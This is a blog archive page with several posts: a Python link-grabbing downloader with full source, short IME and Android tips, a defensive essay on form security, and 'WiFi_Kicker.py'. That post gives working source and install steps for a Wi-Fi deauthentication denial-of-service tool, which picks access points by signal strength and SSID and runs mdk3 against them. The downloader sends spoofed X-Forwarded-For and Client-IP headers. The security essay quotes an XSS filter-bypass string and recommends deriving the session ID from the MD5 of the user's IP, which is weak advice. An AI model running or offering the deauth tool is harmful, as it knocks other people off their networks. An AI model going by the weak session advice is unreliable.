Weil Jimmer's Blog


Month:September 2015

Found 6 records. At Page 1 / 2.

Python Advanced Downloader

Updated 2015-11-20 18:47:40

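I wrote this partly to make my friends envious enough to want to learn programming, and partly because I need it myself. I don't idly build things I have no use for. A developer should, after all, support his own product.

The program is written in Python 3 and is aimed mainly at phones. It requires BeautifulSoup4.

(In the Windows Command Prompt the output looks ugly and has no color; when it runs in a Linux terminal on a phone, it is in color.)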

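Main features:

1. Capture target links from a target URL

For example, grabbing every image on an IG page.

2. Load a list of pages and capture target links from each

For example: load the first page of a site's album and grab its images, then load the second page and grab its images, then the third, and so on.

3. Patterned-URL download, probably the most low-level method.

For example: download http://example.com/1.jpg, http://example.com/2.jpg, http://example.com/3.jpg, then /4.jpg, /5.jpg, and so on.

4. Show the target list

5. Download the links in the list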

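As for image grabbing, calling it an advanced grabber is no exaggeration, although it is still not as powerful as the one I wrote in VB.NET. That one mimics a normal user's browser frame, carries cookies and headers, and even parses JS, which is hard to do in Python.

So at best it is one notch below.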

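Supported:

1. Capture every link on the page that "looks like a URL", even if it is not embedded in any tag (detected with a regular expression).

2. Capture the HREF attribute of A tags. (Hyperlinks)

3. Capture the SRC attribute of IMG tags. (Images)

4. Capture the SRC attribute of SOURCE tags. (HTML5 audio and video)

5. Capture the SRC attribute of EMBED tags. (Flash)

6. Capture the DATA attribute of OBJECT tags. (Browser plug-ins)

7. The HREF attribute of LINK tags. (CSS)

8. The SRC attribute of SCRIPT tags. (JS)

9. The SRC attribute of FRAME tags. (Frames)

10. The SRC attribute of IFRAME tags. (Inline frames)

11. All of the above.

12. A custom tag name and attribute name. (The VB version of my advanced grabber does not have this feature.)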

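Keyword filtering is supported, with AND and OR logic gates: a URL must either contain every keyword or match at least one of them.

Patterned-URL download supports a start number, an end number, the increment per step, and the number of digits to zero-pad to.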
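The four patterned-URL parameters can be illustrated with a small standalone sketch. The function name `patterned_urls` and its argument names are made up for this illustration; only the `{i}` placeholder and the zero-padding with `zfill` come from the program itself.

```python
def patterned_urls(template, start, end, step=1, pad=0):
    """Expand a URL template containing {i} into a list of concrete URLs.

    Hypothetical helper for illustration; `end` is inclusive, as in the
    downloader's own loop.
    """
    if "{i}" not in template:
        raise ValueError("template must contain the {i} placeholder")
    if step <= 0:
        raise ValueError("step must be a positive integer")
    # zfill() left-pads the number with zeros up to `pad` digits.
    return [template.replace("{i}", str(n).zfill(pad))
            for n in range(start, end + 1, step)]


urls = patterned_urls("http://example.com/{i}.jpg", 1, 5, step=2, pad=3)
for u in urls:
    print(u)
```

With a start of 1, an end of 5, a step of 2, and padding to 3 digits, the sketch yields the files 001.jpg, 003.jpg, and 005.jpg.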

※ Relative paths are handled.
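The program resolves relative links with its own `handle_relative_url` function. As a point of comparison, and not as the author's method, the standard library's `urllib.parse.urljoin` covers the same cases; the page URL below is only an example.

```python
from urllib.parse import urljoin

# Example page URL (an assumption for this sketch).
page = "http://example.com/album/page1.html"

# Each link form that can appear in an href/src attribute.
resolved = {
    "img/1.jpg": urljoin(page, "img/1.jpg"),               # same directory
    "/img/1.jpg": urljoin(page, "/img/1.jpg"),             # site root
    "../up.png": urljoin(page, "../up.png"),               # parent directory
    "?page=2": urljoin(page, "?page=2"),                   # query only
    "//cdn.example.com/x.js": urljoin(page, "//cdn.example.com/x.js"),  # scheme-relative
}

for link, absolute in resolved.items():
    print(link, "->", absolute)
```

Unlike a hand-written resolver that always prepends `http:`, `urljoin` gives a scheme-relative link the scheme of the page it was found on.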

****************************************

* Name: Advanced Downloader

* Team: White Birch Forum Team

* Author: Weil Jimmer

* Website: http://0000.twgogo.org/

* Date: 2015.09.26

****************************************

Source Code

# coding: utf-8
"""Weil Jimmer For Safe Test Only"""
import os,urllib.request,urllib.parse,urllib.error,shutil,sys,re
from threading import Thread
from time import sleep
from sys import platform as _platform

GRAY = "\033[1;30m"
RED = "\033[1;31m"
LIME = "\033[1;32m"
YELLOW = "\033[1;33m"
BLUE = "\033[1;34m"
MAGENTA = "\033[1;35m"
CYAN = "\033[1;36m"
WHITE = "\033[1;37m"
BGRAY = "\033[1;47m"
BRED = "\033[1;41m"
BLIME = "\033[1;42m"
BYELLOW = "\033[1;43m"
BBLUE = "\033[1;44m"
BMAGENTA = "\033[1;45m"
BCYAN = "\033[1;46m"
BDARK_RED = "\033[1;48m"
UNDERLINE = "\033[4m"
END = "\033[0m"

if _platform.find("linux")<0:
	GRAY = ""
	RED = ""
	LIME = ""
	YELLOW = ""
	BLUE = ""
	MAGENTA = ""
	CYAN = ""
	WHITE = ""
	BGRAY = ""
	BRED = ""
	BLIME = ""
	BYELLOW = ""
	BBLUE = ""
	BMAGENTA = ""
	BCYAN = ""
	UNDERLINE = ""
	END = ""
	os.system("color e")

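import subprocess

def pip_install(package):
	# pip.main() was removed in pip 10, so run pip as a module of the current interpreter instead.
	subprocess.call([sys.executable,"-m","pip","install",package])

try:
	import pip
except ImportError:
	print(RED + "Error: pip is not installed!" + END)
	input()
	sys.exit()

try:
	from bs4 import BeautifulSoup
except ImportError:
	print(RED + "Error: bs4 is not installed! Trying to install it..." + END)
	pip_install("beautifulsoup4")
	from bs4 import BeautifulSoup

phone_ = False

try:
	# The android module only exists on phones; elsewhere fall back to the clipboard package.
	import android
	droid = android.Android()
	phone_ = True
except Exception:
	try:
		import clipboard
	except ImportError:
		print(RED + "Error: clipboard is not installed! Trying to install it..." + END)
		pip_install("PyGTK")
		pip_install("clipboard")
		import clipboard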

def get_clipboard():
	global phone_
	if phone_==True:
		return str(droid.getClipboard().result)
	else:
		return clipboard.paste()

global target_url
target_url = [[],[],[],[],[],[],[],[],[]]

def __init__(self):
	print("")

print (RED)
print ("*" * 40)
print ("*  Name:\tWeil_Advanced_Downloader")
print ("*  Team:" + LIME + "\tWhite Birch Forum Team" + RED)
print ("*  Developer:\tWeil Jimmer")
print ("*  Website:\thttp://0000.twgogo.org/")
print ("*  Date:\t2015.10.09")
print ("*" * 40)
print (END)

root_dir = "/sdcard/"
print("Root directory: " + root_dir)
save_dir=str(input("Save folder: "))
save_temp_dir=str(input("Temporary folder (deleted automatically): "))

global target_array_index
target_array_index = 0

def int_s(k):
	try:
		return int(k)
	except:
		return -1

def reporthook(blocknum, blocksize, totalsize):
	readsofar = blocknum * blocksize
	if totalsize > 0:
		percent = readsofar * 1e2 / totalsize
		s = "\r%5.1f%% %*d / %d bytes" % (percent, len(str(totalsize)), readsofar, totalsize)
		sys.stderr.write(s)
		if readsofar >= totalsize:
			sys.stderr.write("\r" + MAGENTA + "%5.1f%% %*d / %d bytes" % (100, len(str(totalsize)), totalsize, totalsize))
	else:
		sys.stderr.write("\rUnknown file size... downloading... " + str(readsofar) + " bytes")
		#sys.stderr.write("read %d\n" % (readsofar,))

# Characters left untouched by url_encode(): URL delimiters plus "%" so already-encoded URLs are not encoded twice.
URL_SAFE_CHARS = "/:?#[]@!$&'()*+,;=%~"

def url_encode(url_):
	# Percent-encode only what is illegal in a URL; quote()'s default would also encode "?", "=" and "&" and break query strings.
	for scheme in ("http://","https://","ftp://"):
		if url_.startswith(scheme):
			return scheme + urllib.parse.quote(url_[len(scheme):], safe=URL_SAFE_CHARS)
	if not url_.startswith("http"):
		return 'http://' + urllib.parse.quote(url_, safe=URL_SAFE_CHARS)
	return url_

def url_correct(url_):
	if ((not url_.startswith("ftp://")) and (not url_.startswith("http"))):
		return 'http://' + (url_)
	return url_

def download_URL(url,dir_name,ix,total,encode,return_yes_no):
	# Download url into root_dir/dir_name. With return_yes_no==1 the file's text
	# (decoded as `encode`) is returned, or "ERROR" if it could not be fetched or read.
	global save_temp_dir
	prog_str = "(" + str(ix) + "/" + str(total) + ")"
	if (total==0):
		prog_str=""
	file_name = url.split('/')[-1]
	# Drop characters that are not allowed in file names.
	for bad_char in ':*"\\|?<>':
		file_name=file_name.replace(bad_char,"")
	if file_name=="":
		file_name="NULL"
	local_file=None
	try:
		print(YELLOW + "Downloading... " + prog_str + "\n" + url + "\n" + END)
		if not os.path.exists(root_dir + dir_name + "/") :
			os.makedirs(root_dir + dir_name + "/")
		# FancyURLopener is deprecated; a globally installed opener gives urlretrieve() the same headers.
		opener = urllib.request.build_opener()
		opener.addheaders = [
			("User-Agent", 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36'),
			("Referer", url_encode(url)),
			("X-Forwarded-For", "0.0.0.0"),
			("Client-IP", "0.0.0.0"),
		]
		urllib.request.install_opener(opener)
		local_file,response_header=urllib.request.urlretrieve(url_encode(url), root_dir + dir_name + "/" + str(ix) + "-" + file_name, reporthook)
		print(MAGENTA + "Download complete" + prog_str + "!" + END)
	except urllib.error.HTTPError as ex:
		print(RED + "Download failed" + prog_str + "! HTTP " + str(ex.code) + END)
	except Exception:
		print(RED + "Download failed" + prog_str + "! Unknown error!" + END)
	if return_yes_no==0:
		return ""
	try:
		# local_file is still None when the download failed, which also lands in the except branch.
		with open(local_file,encoding=encode) as f:
			k=f.read()
	except Exception:
		k="ERROR"
		print(RED + "Failed to read the file!" + END)
	try:
		if dir_name==save_temp_dir:
			shutil.rmtree(root_dir + save_temp_dir + "/")
	except Exception:
		print(RED + "Failed to delete the temporary folder!" + END)
	return k

def check_in_filter(url_array,and_or,keyword_str):
	# Keep only the URLs that pass the keyword filter.
	# and_or==1 (AND): every keyword must appear; and_or==0 (OR): one keyword is enough.
	# The original loop kept every URL in OR mode, even those matching no keyword.
	if keyword_str=="":
		return url_array
	keywords_ = keyword_str.split(',')
	match = all if and_or==1 else any
	return [array_x for array_x in url_array if match(keyword_ in str(array_x) for keyword_ in keywords_)]

def handle_relative_url(handle_url,ori_url):
	handle_url=str(handle_url)
	if handle_url=="":
		return ori_url
	if handle_url.startswith("?"):
		temp_form_url = ori_url
		search_A = ori_url.find("?")
		if search_A<0:
			return ori_url + handle_url
		else:
			return ori_url[0:search_A] + handle_url
	if handle_url.startswith("//"):
		return "http:" + handle_url
	if (handle_url.startswith("http://") or handle_url.startswith("https://") or handle_url.startswith("ftp://")):
		return handle_url
	root_url = ori_url
	search_ = root_url.find("//")
	if search_<0:
		return handle_url
	search_x = root_url.find("/", search_+2);
	if (search_x<0):
		root_url = ori_url
	else:
		root_url = ori_url[0:search_x]
	same_dir_url = ori_url[search_+2:]
	search_x2 = same_dir_url.rfind("/")
	if search_x2<0:
		same_dir_url = ori_url
	else:
		same_dir_url = ori_url[0:search_x2+search_+2]
	if handle_url.startswith("/"):
		return (root_url + handle_url)
	if handle_url.startswith("./"):
		return (same_dir_url + handle_url[1:])
	return (same_dir_url + "/" + handle_url)

def remove_duplicates(values):
	output = []
	seen = set()
	for value in values:
		if value not in seen:
			output.append(value)
			seen.add(value)
	return output

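def get_text_url(file_content):
	# Non-capturing groups and group(0) return whole URLs; re.findall() with capturing
	# groups returned tuples of fragments. The stray "&amp;" in the character class is now "&".
	pattern = r"(?:https?|ftp)://[\w+?.]+[a-zA-Z0-9~!@#$%^&*()_\-=+\\/?.:;',]*"
	return [m.group(0) for m in re.finditer(pattern, file_content)]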

def get_url_by_tagname_attribute(file_content,tagname,attribute,url_):
	soup = BeautifulSoup(file_content,'html.parser')
	url_return_array = []
	for link in soup.find_all(tagname):
		if link.get(attribute)!=None:
			url_return_array.append(handle_relative_url(link.get(attribute),url_))
	return url_return_array

def get_url_by_targetid_attribute(file_content,tagname,attribute,url_):
	soup = BeautifulSoup(file_content,'html.parser')
	url_return_array = []
	for link in soup.find_all(id=tagname):
		if link.get(attribute)!=None:
			url_return_array.append(handle_relative_url(link.get(attribute),url_))
	return url_return_array

def get_url_by_targetname_attribute(file_content,tagname,attribute,url_):
	soup = BeautifulSoup(file_content,'html.parser')
	url_return_array = []
	for link in soup.find_all(name=tagname):
		if link.get(attribute)!=None:
			url_return_array.append(handle_relative_url(link.get(attribute),url_))
	return url_return_array

# Tag/attribute pair scanned by each of the numbered capture methods 2-10.
TAG_METHODS = {
	2: ("a","href"),
	3: ("img","src"),
	4: ("source","src"),
	5: ("embed","src"),
	6: ("object","data"),
	7: ("link","href"),
	8: ("script","src"),
	9: ("frame","src"),
	10: ("iframe","src"),
}

def run_functional_get_url(way_X,html_code,target_array_index,and_or,keywords,ctagename,cattribute):
	# Collect URLs from html_code with the chosen method, then append, de-duplicate and filter the target list.
	# temp_url (the URL of the page being parsed) is a module-level variable set by the menu loop.
	global target_url
	ori_size=len(target_url[target_array_index])
	found=[]
	if way_X==1 or way_X==11:
		found.extend(get_text_url(html_code))
	if way_X==11:
		# "All of the above": plain-text URLs first, then every tag/attribute pair in order.
		for tag_,attr_ in TAG_METHODS.values():
			found.extend(get_url_by_tagname_attribute(html_code,tag_,attr_,temp_url))
	elif way_X in TAG_METHODS:
		tag_,attr_=TAG_METHODS[way_X]
		found.extend(get_url_by_tagname_attribute(html_code,tag_,attr_,temp_url))
	elif way_X==12:
		found.extend(get_url_by_tagname_attribute(html_code,ctagename,cattribute,temp_url))
	elif way_X==13:
		found.extend(get_url_by_targetid_attribute(html_code,ctagename,cattribute,temp_url))
	elif way_X==14:
		found.extend(get_url_by_targetname_attribute(html_code,ctagename,cattribute,temp_url))
	target_url[target_array_index].extend(found)
	target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
	target_url[target_array_index]=check_in_filter(target_url[target_array_index],and_or,keywords)
	print( LIME + "Capture complete! URLs captured: " + str(len(target_url[target_array_index])-ori_size) + END)

def ask_number(prompt,low,high,error_msg):
	# Keep asking until the user enters an integer between low and high (inclusive).
	while True:
		value=int_s(input("\n\n" + CYAN + prompt + END + "\n\n"))
		if low<=value<=high:
			return value
		print(error_msg)

def ask_list(action):
	# Ask which of the 8 target lists the given action applies to.
	return ask_number("Target list to " + action + ": (enter a number from 1 to 8)",1,8,"Invalid input! Only 8 lists are available; enter a number between 1 and 8.")

def ask_way():
	# Ask for the capture method, plus the custom tag/ID/Name and attribute for methods 12-14.
	way_X=ask_number("Capture method:\n(1) Search the page for plain-text URLs\n(2) HREF of every A tag\n(3) SRC of every IMG tag\n(4) SRC of every SOURCE tag\n(5) SRC of every EMBED tag\n(6) DATA of every OBJECT tag\n(7) HREF of every LINK tag\n(8) SRC of every SCRIPT tag\n(9) SRC of every FRAME tag\n(10) SRC of every IFRAME tag\n(11) All of the above\n(12) Custom tag name and attribute name\n(13) Custom ID and attribute name\n(14) Custom Name and attribute name",1,14,"Invalid input!")
	if way_X>=12:
		return way_X,str(input("\nTarget tag name / ID / Name: ")),str(input("\nTarget attribute name: "))
	return way_X,"",""

def ask_keywords():
	# Ask for the filter keywords; the AND/OR choice is only needed when keywords were given.
	keywords=str(input("\n" + CYAN + "Filter keywords (optional; separate several with commas):" + END + "\n\n"))
	and_or=0
	if keywords!="":
		and_or=ask_number("Keyword logic gate: (1 = and, 0 = or)",0,1,"Invalid input!\n")
	return keywords,and_or

def confirm(question):
	return str(input("\n\n" + RED + question + " (y/n)" + END + "\n\n")).lower()=="y"

def pause():
	input("\n\nDone! Press ENTER to leave this function...")

while True:
	method_X=ask_number("Action to run:\n(1) Capture data from a target page\n(2) Load a URL list and capture data from each page\n(3) Patterned-URL download\n(4) Show a list\n(5) Download a target list\n(6) Clear a target list\n(7) Copy a list\n(8) Delete one value from a target list\n(9) Paste URLs from the clipboard (one per line)",1,9,"Invalid input!\n\n")
	if (method_X==1):
		target_array_index=ask_list("save into")
		way_X,target_tagname_,target_attribute_=ask_way()
		temp_url=url_correct(str(input("\nTarget page URL: ")))
		temp_url_code=str(input("\nTarget page encoding (utf-8, big5, gbk, ...): "))
		keywords,and_or=ask_keywords()
		html_code=download_URL(temp_url,save_temp_dir,0,0,temp_url_code,1)
		if html_code=="ERROR":
			continue
		run_functional_get_url(way_X,html_code,target_array_index,and_or,keywords,target_tagname_,target_attribute_)
		pause()
	elif(method_X==2):
		RUN_array_index=ask_list("load pages from")
		target_array_index=ask_list("save into")
		way_X,target_tagname_,target_attribute_=ask_way()
		keywords,and_or=ask_keywords()
		temp_url_code=str(input("\nEncoding of the pages in the list (utf-8, big5, gbk, ...): "))
		# Iterate over a snapshot, because the source and destination may be the same list.
		pages=list(target_url[RUN_array_index])
		for x in range(0,len(pages)):
			# Relative links must be resolved against the page currently being parsed.
			temp_url=str(pages[x])
			html_code=download_URL(temp_url,save_temp_dir,(x+1),len(pages),temp_url_code,1)
			if html_code=="ERROR":
				continue
			run_functional_get_url(way_X,html_code,target_array_index,and_or,keywords,target_tagname_,target_attribute_)
		pause()
	elif(method_X==3):
		start_number=int_s(input("Start (number): "))
		end_number=int_s(input("End (number): "))
		step_ADD=int_s(input("Increment per step: "))
		str_padx=int_s(input("Zero-pad to this many digits: "))
		if step_ADD<=0:
			# range() rejects a step of 0, and a negative step would download nothing.
			step_ADD=1
		if not os.path.exists(root_dir + save_dir) :
			os.makedirs(root_dir + save_dir )
		print(LIME + "※ Files will be saved in the " + root_dir + save_dir + " folder." + END)
		while True:
			url=url_correct(input(LIME + "Target URL ({i} is the incrementing number): " + END))
			if url.find("{i}")>=0:
				break
			else:
				print("The URL does not contain {i}; please enter it again.")
		for x in range(start_number,(end_number+1),step_ADD):
			download_URL(url.replace("{i}",str(x).zfill(str_padx)),save_dir,x,(end_number),"utf-8",0)
		pause()
	elif(method_X==4):
		RUN_array_index=ask_list("show")
		for x in range(0,(len(target_url[RUN_array_index]))):
			print("URL (" + str(x+1) + "/" + str(len(target_url[RUN_array_index])) + "):" + str(target_url[RUN_array_index][x]))
		pause()
	elif(method_X==5):
		RUN_array_index=ask_list("download")
		for x in range(0,(len(target_url[RUN_array_index]))):
			download_URL(str(target_url[RUN_array_index][x]),save_dir,(x+1),len(target_url[RUN_array_index]),"utf-8",0)
		pause()
	elif(method_X==6):
		if confirm("Really clear a target list?"):
			target_url[ask_list("clear")]=[]
			pause()
	elif(method_X==7):
		if confirm("Really copy a target list?"):
			RUN_array_index=ask_list("copy from")
			target_array_index=ask_list("save into")
			# Copy the list itself; plain assignment would make both slots share one list.
			target_url[target_array_index]=list(target_url[RUN_array_index])
			pause()
	elif(method_X==8):
		if confirm("Really delete one value from a target list?"):
			RUN_array_index=ask_list("delete a value from")
			last_index=len(target_url[RUN_array_index])-1
			if last_index>=0:
				# Indexes are 0-based here, so the first URL shown by action (4) is number 0.
				target_array_index=ask_number("Index of the value to delete: (enter a number from 0 to " + str(last_index) + ")",0,last_index,"Invalid input! Enter a number between 0 and " + str(last_index) + "!")
				del target_url[RUN_array_index][target_array_index]
			else:
				print("The list is empty, so there is nothing to delete.")
			pause()
	elif(method_X==9):
		if confirm("Really paste the clipboard into a target list?"):
			target_array_index=ask_list("save into")
			kk=get_clipboard()
			if kk=="" or kk==None:
				print(RED + "The clipboard is empty!" + END)
			else:
				ori_size=len(target_url[target_array_index])
				# splitlines() also handles Windows line endings; blank lines are skipped.
				target_url[target_array_index].extend([line.strip() for line in kk.splitlines() if line.strip()!=""])
				target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
				print(LIME + "Added " + str(len(target_url[target_array_index])-ori_size) + " new, non-duplicate URLs." + END)
			pause()
input("\n\nPress ENTER to exit...")

 


This entry was posted in General, Experience, Free, Functions, Note, Product, Python By Weil Jimmer.

Fix for an IME That Won't Start

Published 2015-09-26 14:13:00

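As shown in the picture, seeing this screen while focus is on a non-text field is perfectly normal. If the IME still does not appear after you switch to a field that accepts input, first try Ctrl + Space. If it still won't start, the program has probably been closed or has crashed.

Try: press Win + R, type "C:\Windows\system32\ctfmon.exe", and press Enter. The input method should then come back.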


This entry was posted in General, Experience, Functions By Weil Jimmer.

WiFi_Kicker.py DeAuth Attack

Updated 2015-09-20 12:02:18

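I had too much free time today. Well, not really; I just didn't want to spend it studying, which bores me the moment I think of it. So I wrote a small Python program as practice.

WiFi Kicker: as the name suggests, it is a program that knocks other people offline.

Main features: selective DoS of targets, a custom target SSID (some places, such as schools and companies, have many access points with the same name that are actually different base stations), a custom signal strength (for example, DeAuth-DoS a target only if its signal is stronger than -70 dBm), and a custom interval.

First of all, since I'm a beginner the program is not very well designed. It needs two network cards, wlan0 and wlan1,

and wlan1 must support monitor mode.

Required components: aircrack, mdk3, and the Python wifi library.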

apt-get install python-pip
apt-get install aircrack-ng
apt-get install mdk3
pip install wifi

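This was written mainly for my own tablet, whose desktop environment is LXDE. The commands call the lxterminal application, so you may need to adapt them yourself.

Why I wrote it: in some places my AR9271 card finds far too many devices! Running mdk3 on its own hardly DoSes anything, and my own card goes down instead. So I wrote something that picks targets by signal strength and SSID, which makes a targeted DoS somewhat more effective.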

wifi_kicker.py - Source Code

# coding: utf-8
"""By Weil Jimmer - For Safe Test Only"""
from wifi import Cell, Scheme
import time,os,subprocess

def __init__(self):
	print("")

class wcolors:
	GRAY = "\033[1;30m"
	RED = "\033[1;31m"
	LIME = "\033[1;32m"
	YELLOW = "\033[1;33m"
	BLUE = "\033[1;34m"
	MAGENTA = "\033[1;35m"
	CYAN = "\033[1;36m"
	WHITE = "\033[1;37m"
	DARK_RED = "\033[1;38m"
	BGRAY = "\033[1;47m"
	BRED = "\033[1;41m"
	BLIME = "\033[1;42m"
	BYELLOW = "\033[1;43m"
	BBLUE = "\033[1;44m"
	BMAGENTA = "\033[1;45m"
	BCYAN = "\033[1;46m"
	BDARK_RED = "\033[1;48m"
	BOLD = "\033[1m"
	UNDERLINE = "\033[4m"
	END = "\033[1;m"
	END_BOLD = "\033[1m"

print ("\033[1;31;40m")
print ("*" * 40)
print ("*  ")
print ("*  Name:\t" + wcolors.BOLD + "WiFi Ass Kicker" + wcolors.END_BOLD)
print ("*  ")
print ("*  Team:\tWhite Birch Forum Team")
print ("*  ")
print ("*  Website:\thttp://0000.twgogo.org/")
print ("*  ")
print ("*  Date:\t2015.09.20")
print ("*  ")
print ("*" * 40)
print ("\033[0m")

target_singal_limit = int(raw_input("Target signal strength (include the minus sign): "))
target_ssid = str(raw_input("Target SSID (optional, may be left empty): "))
time_X = int(raw_input("Interval in seconds: "))

if time_X<=0:
	time_X=10

os.system("ifconfig wlan1 up")
time.sleep(2)
print("wlan1 UP..")
os.system("airmon-ng start wlan1")
time.sleep(2)
print("wlan1mon UP..")

os.system("lxterminal -e 'bash -c \"airodump-ng wlan1mon; exec bash\"'")
os.system("lxterminal -e 'bash -c \"mdk3 wlan1mon d -b black_list.txt -s 1024; exec bash\"'")
try:
	while True:
		try:
			target_mac=[]
			print(wcolors.RED + "Scanning..." + wcolors.END)
			k=Cell.all('wlan0')
			print(wcolors.RED + "Scan Done." + wcolors.END) 
			for x in range(0,len(k)):
				if (k[x].signal>=target_singal_limit and (target_ssid==k[x].ssid or target_ssid=="")):
					target_mac.append(str(k[x].address))
					print("Found MAC:" + wcolors.RED + str(k[x].address) + wcolors.END + "\tSIGNAL:" + wcolors.RED + str(k[x].signal) + wcolors.END + "\tSSID:" + wcolors.RED + k[x].ssid + wcolors.END)
				else:
					print("Found MAC:" + wcolors.YELLOW + str(k[x].address) + wcolors.END + "\tSIGNAL:" + wcolors.YELLOW + str(k[x].signal) + wcolors.END + "\tSSID:" + wcolors.YELLOW + k[x].ssid + wcolors.END)
			target = open('./black_list.txt', 'w')
			for x in range(0,len(target_mac)):
				target.write(target_mac[x] + "\n")
			target.close()
		except:
			print("")
		time.sleep(time_X)
except:
	os.system("airmon-ng stop wlan1mon")
	time.sleep(2)
	print("wlan1mon DOWN..")
raw_input("\n\nPress ENTER to exit...")


This entry was posted in General, Experience, Functions, Note, Python, Tools, Wi-Fi By Weil Jimmer.

Android: Keeping Views from Moving When the Keyboard Appears

Updated 2018-03-28 12:24:01

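It annoyed me that the keyboard resized my View every time it appeared, and searching turned up no fix. What I eventually found online was that the object is not being resized but "moved". Adding the following attribute to the target object's XML solves it.

android:isScrollContainer="false"

This is just a note to myself.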


This entry was posted in Android, General, Experience, Functions, Java, XML By Weil Jimmer.

A Brief Look - Information Security - Defending Forms

Updated 2017-03-04 14:51:53

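With nothing better to do, I was Googling keywords related to my own blog to see how visible it is and what shows up. I searched for "form attack" and found an article on form security on someone else's blog, which moved me to write something on the subject too.

--This is only my humble opinion; experts are welcome to correct me.--

To begin with, a form written around a few key points is not easy to attack.

1. Filter every Request variable.

This is the most basic defense against XSS: malicious code written in JavaScript, cross-site framing, and similar attacks. For the most part, blocking HTML tags is enough. The real trouble starts if I want to let users write HTML; in that case the only option is to offer BBCode. Never let users enter HTML directly; even a restricted subset is problematic.

Attackers can trigger XSS through event handlers such as onClick, onError, and onLoad. Dangerous.

Is it safe once every "<", ">", and single and double quote has been replaced? Maybe, maybe not.

Some people simply replace "<script". It feels right, but it leaves a big hole.

If I write "<script<scr<scriptipt>", one round of filtering turns it into "<script>". For this kind of string removal it is best to write a while-true loop and strip it clean: remove on every match until nothing matches any more. (Do this only as a last resort.)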
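The single-pass hole and the repeat-until-clean loop described above can be reproduced in a few lines. This is only a sketch; the helper name `strip_until_clean` is made up for the illustration.

```python
def strip_until_clean(text, banned):
    """Remove `banned` from `text` repeatedly until no occurrence is left.

    Hypothetical helper for illustration only.
    """
    if not banned:
        return text  # an empty pattern would otherwise loop forever
    while banned in text:
        text = text.replace(banned, "")
    return text


payload = "<script<scr<scriptipt>"

# One pass removes two copies of "<script", and the leftovers join up again.
single_pass = payload.replace("<script", "")

# Repeating the removal leaves nothing that still contains "<script".
repeated = strip_until_clean(payload, "<script")

print(repr(single_pass))
print(repr(repeated))
```

Note that the comparison here is case-sensitive while HTML tag names are not, which is one more reason to treat stripping as a last resort.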

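My personal advice is to switch to HTML encoding everywhere (HTML encoding means strings of the form &#Unicode;). If an argument goes into a database statement, do not use the XXX=XXX form (numeric type); always use something like XXX="XXX", so that the value is enclosed in quotes. Also filter out all single and double quotes, <>, and backslashes.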
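A minimal sketch of both ideas in Python, under stated assumptions: `html.escape` from the standard library emits named entities such as `&lt;` rather than the numeric `&#...;` form mentioned above, and the database half uses `sqlite3` parameter binding, a swapped-in technique that replaces manual quoting and filtering rather than the approach the post describes. The `users` table and the helper names are invented for the example.

```python
import html
import sqlite3


def encode_for_html(value):
    """Encode <, >, & and both quote characters before echoing user input."""
    return html.escape(value, quote=True)


def find_user(conn, name):
    """Look up a user by name; the driver binds the value, so quotes in
    `name` cannot end the string literal in the SQL statement."""
    cur = conn.execute("SELECT id, name FROM users WHERE name = ?", (name,))
    return cur.fetchall()


# Throwaway in-memory database with a hypothetical users table.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
conn.execute("INSERT INTO users (name) VALUES (?)", ("alice",))

print(encode_for_html('<img src=x onerror="alert(1)">'))
print(find_user(conn, "alice"))
print(find_user(conn, "' OR '1'='1"))
```

With binding, the injection attempt in the last line is just a name that matches no row.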

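As for how variables are passed in, I suggest switching everything to POST instead of GET. Unless it is for pagination or something similar, there is no need for GET at all, and it is dangerous. This has to do with some servers having magic quotes enabled, which automatically escapes quote characters, so POST is somewhat safer. POST is also harder for an attacker to work with.

Values that come in through cookies and headers should be filtered as well.

2. Don't use cookies; lock the session and the IP.

Let me stress again how dangerous cookies are. I write almost everything with sessions only and no cookies at all. I know that a session has a so-called session ID that is stored in a cookie, so an attacker who obtains someone else's session ID can use cookie spoofing to take over that account's privileges, just like that.

Many defenses found online use an MD5 computed from the IP and User-Agent as a security code and log the user out as soon as the incoming code differs from the earlier one. It is a great approach, but a lot of trouble. It helps somewhat for login forms. For a comment form, though, I can deliberately turn off cookies so that the server's session ID fails, and then it is quite possible to post a comment without going through the CAPTCHA at all (provided the other side does not check whether the CAPTCHA value in the session is empty).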
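The IP plus User-Agent security code mentioned above might look like the following sketch. The function names and the `|` separator are assumptions made for the illustration; MD5 is used only because the text names it.

```python
import hashlib
import hmac


def session_fingerprint(ip, user_agent):
    """MD5 of the client's IP and User-Agent, stored when the session starts."""
    raw = (ip + "|" + user_agent).encode("utf-8")
    return hashlib.md5(raw).hexdigest()


def is_same_client(stored_fingerprint, ip, user_agent):
    """Compare the stored code with one recomputed from the current request."""
    current = session_fingerprint(ip, user_agent)
    # compare_digest avoids leaking how many leading characters matched.
    return hmac.compare_digest(stored_fingerprint, current)


# At login: remember the fingerprint in the session.
stored = session_fingerprint("203.0.113.5", "Mozilla/5.0 (example)")

# On later requests: log the user out when this returns False.
print(is_same_client(stored, "203.0.113.5", "Mozilla/5.0 (example)"))
print(is_same_client(stored, "198.51.100.9", "Mozilla/5.0 (example)"))
```

A stolen session ID replayed from another address or browser then fails the check, at the cost of logging out users whose IP changes.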

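My approach is to force the session ID to be the MD5 of the IP. It may be a little inconvenient, but I think it is actually better: there is no need to worry about session hijacking, or about someone coming back with a fresh ID and posting again despite a 15-minute ban.

3. Prevent form forgery and malicious flooding

What is form forgery? The values a form submits can be written directly as name=value&name2=value2 ... without end, and the checks only look at the values. Many back ends do not care where a request comes from, which is very convenient for attackers: copy an identical form and you can forge any number of requests.

Some sites check the referring page via the Referer header, but headers can be forged too.

So it is best to generate a Key the moment the form is visited. When the values reach the back end, check whether the Key matches; if it does not, the form was forged. Destroy the Key each time validation passes and generate a new one. To obtain a Key, the attacker has to keep requesting the "original" form and extract the Key from it before any data can be sent.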
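The one-time Key scheme can be sketched as follows. The class `FormKeyStore`, the in-memory dictionary, and the use of `secrets.token_urlsafe` are assumptions for this illustration; a real site would keep the key in its own session storage. This sketch also destroys the Key on every attempt, not only on success.

```python
import hmac
import secrets


class FormKeyStore:
    """Hypothetical one-time form key store, keyed by session id."""

    def __init__(self):
        self._keys = {}

    def issue(self, session_id):
        """Called when the form page is rendered; embed the result in a hidden field."""
        key = secrets.token_urlsafe(32)
        self._keys[session_id] = key
        return key

    def verify(self, session_id, submitted_key):
        """Called when the form is posted; the key is destroyed on every attempt."""
        expected = self._keys.pop(session_id, None)
        if expected is None or not isinstance(submitted_key, str):
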